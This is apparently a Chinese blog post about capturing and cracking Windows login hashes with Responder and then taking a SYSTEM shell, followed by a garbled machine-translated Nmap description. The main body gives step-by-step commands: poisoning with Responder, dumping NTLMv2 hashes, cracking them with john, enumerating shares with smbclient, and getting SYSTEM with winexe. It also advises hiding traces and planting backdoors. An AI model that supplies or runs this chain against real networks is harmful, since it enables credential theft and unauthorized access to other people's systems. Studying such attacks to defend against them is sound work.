不利用系统漏洞拿shell,kali强大工具Responder

这是一种不用通过漏洞利用来获取权限的一种方法,使用的是kali的一个工具,叫Responder,主要是通过监听网络,有人如果访问了虚假的共享文件地址,就会获得该系统登录口令的哈希值,然后再通过脚本进行hash爆破就可以获取口令,再通过ipc建立空连接获得系统权限。

我们的第一步当然是获取该工具喽,非常的简单,只要从github上下载即可,
当然首先你先需要安装一下python环境和git工具

# apt-get intall build-essential git python-dev

然后是直接从git上克隆到本地

# git clone https://github.com/lgandx/Responder.git

等他下载完成然后需要进行一下更新(如果存在更新的话)

# cd Respondder/
#git pull

会出现一个
Already up-to-date(以更新到最新)

然后我们就可以使用啦!

ok,那我们开始正文!

那些什么-h啥的就不废话了,不会有人真的不知道吧

首先我们启动一个内网监听(需要先cd到responder文件夹下)

# ./Responder.py -wf -I eth0

在这里插入图片描述

-wf 应该是设定web代理 -I 指定网卡,这里我指定的是eth0,我们可以通过ifconfig指令查看自己的ip以及网卡信息,具体怎么添加删除一个网卡这里不再赘述,scdn一搜一大堆

如下图,开始监听了。

然后我们在任何windows系统访问一下虚假的共享文件地址,

<******>\\NOTAREALHOST\NOTARALSHARE\notarealfile.exe

会出现拒绝访问
然后我们的监听端就会出现一些奇妙的信息。

在这里插入图片描述

没错,我们抓到了我们的登录口令hash
然后我们q退出,运行

./DumpHash.py

在这里插入图片描述

会把我们抓到的hash导出成john可以处理的格式

这里我们抓到了两个hash,一个是我本机的登录口令,一个是我的虚拟机windows server 2012R2的登录口令hash
我们的根目录会生成两个txt文件,分别存储的是两个版本的hash,具体是什么版本在我们上一步导出时已经明确指出,如上图:时NTLMV2版本。
在这里插入图片描述

然后我们用我们的john进行指定版本hash爆破,爆破并不是百分百成功的。

john DumpNTLMv2.txt

在这里插入图片描述

现在我们能做的只有等。。。

获取到口令之后我们能干的事情就太多了,看22端口开了嘛,开了直接ssh连接,或者还有更强的,验证目标系统上是否存在ipc共享,如下:

smbclient -U [username]%[password] -L [ipaddress]

在这里插入图片描述

ok可以清楚的看到它开着,然后我们直接用kali自带工具winexe拿shell

winexe -U [username]%[password] --uninstall \\[ipaddress] cmd.exe

或者直接给他提升系统权限

winexe -U [username]%[password] --uninstall --system \\[ipaddress] cmd.exe

注意一定要带参数–unistall 不然会留下你的大猪蹄子的哦
在这里插入图片描述

直接就是系统权限,该留后门留后门,该干嘛干嘛就完事了,一次愉快的旅程,*但是有个问题,怎么诱导它访问共享文件呢?that is a question。 *

  • 1
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Kali Linux Tools 中文說明書 nmap包说明 NMAP(“网络映射”)是一个自由和开放源码(许可证)工具进行网络发现和安全审计。许多系统和网络管理员也觉得有用,如网络库存,管理服务升级计划和监控主机或服务的正常运行时间的任务。 NMAP使用原始IP包以新颖的方式来确定哪些主机是在网络上可用,这些主机正在提供什么样的服务(应用程序的名称和版本),什么操作系统(和OS版本),它们都在运行,什么类型的分组过滤器/防火墙在使用中,和许多其他特性。它的目的是快速扫描大型网络,但能正常工作对单个主机。 Nmap的运行在所有主要计算机操作系统,和官方的二进制软件包可用于Linux,Windows和Mac OS X的除了经典的命令行Nmap的可执行文件,nmap的套件包括一个先进的GUI和结果浏览器(Zenmap)一种灵活的数据传送,重定向和调试工具(NCAT),用于比较扫描结果(Ndiff)的实用程序,并且一个分组产生和响应分析工具(Nping)。 Nmap的被评为“年度安全产品”,由Linux杂志,信息世界,LinuxQuestions.Org和Codetalker摘要。有人甚至功能十二电影,包括重装上阵,虎胆龙威4,女孩龙纹身,和谍影重重。 Nmap是比较合适? 灵活:支持数十台先进的技术映射出网络充满了IP过滤,防火墙,路由器和其他障碍。这包括许多端口扫描机制(包括TCP和UDP),操作系统检测,版本检测,ping扫描,等等。请参阅文档页面。 功能强大:Nmap的已被用来扫描字面上机数十万庞大的网络。 便携性:大多数操作系统都支持,包括Linux,微软的Windows,FreeBSD下,OpenBSD系统,Solaris和IRIX,Mac OS X中,HP-UX,NetBSD的,SUN OS,Amiga的,等等。 很简单:虽然Nmap的提供了一套丰富的先进功能的电力用户,你可以开始作为简称为“NMAP -v -A targethost”。这两种传统的命令行和图形(GUI)版本可供选择,以满足您的喜好。二进制文件是为那些谁不希望从源代码编译的Nmap。 免费:在Nmap的项目的主要目标是帮助使互联网更安全一点,并为管理员提供/审计/黑客探索他们的网络的先进工具。 NMAP是可以免费下载,并且还配备了完整的源代码,你可以修改,并根据许可协议的条款重新分发。 有据可查:重大努力已投入全面和最新的手册页,白皮书,教程,甚至一整本书!发现他们在这里多国语言。 支持:虽然Nmap的同时没有担保,这是深受开发者和用户一个充满活力的社区提供支持。大多数这种相互作用发生在Nmap的邮件列表。大多数的bug报告和问题应该发送到NMAP-dev邮件列表,但你读的指引之后。我们建议所有用户订阅低流量的nmap-黑客公布名单。您还可以找到的Nmap在Facebook和Twitter。对于即时聊天,加入Freenode上或连接到efnet的#nmap通道。 好评:Nmap的赢得了无数奖项,包括“信息安全产品奖”,由Linux杂志,信息世界和Codetalker文摘。它已被刊登在数以百计的杂志文章,几部电影,几十本书,一本漫画书系列。访问进一步的细节新闻页面。 热门:成千上万的人下载Nmap的每一天,它包含许多操作系统(红帽Linux,Debian的Linux中,Gentoo的,FreeBSD下,OpenBSD的,等等)。它是在Freshmeat.Net库的前十名(总分30000)方案之间。这是很重要的,因为它的Nmap借给其充满活力的发展和用户的支持群体。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值